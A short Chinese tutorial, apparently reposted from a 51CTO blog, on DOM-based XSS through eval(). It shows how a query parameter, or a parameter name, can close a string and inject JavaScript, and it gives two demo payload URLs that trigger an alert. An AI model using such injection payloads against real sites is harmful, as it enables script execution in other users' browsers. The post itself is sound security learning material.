大哥带的DOM-XSS进阶eval构造XSS
0X01源码分析那么我们可以如何来构造语法呐??
已知eval函数可以执行js
最终的输出是eval(this.xss="你提交的参数";)
那我们是不是可以从参数这里构造一个js
比如
this.xss=1";alert(/zhong/);//
那么我们要这样构造
http://www.xss_demo.com/DOM-xss5.php?xss=k";alert(/zhong/);//
当然这里未对参数名称做验证我们也可以直接在参数名称里面构造
xss
http://www.xss_demo.com/DOM-xss5.php?xss;alert(/zhong/);//=123456
切记 学习之路 少就是多 慢就是快
文档来源:51CTO技术博客https://blog.51cto.com/u_13953961/3118426
页:
[1]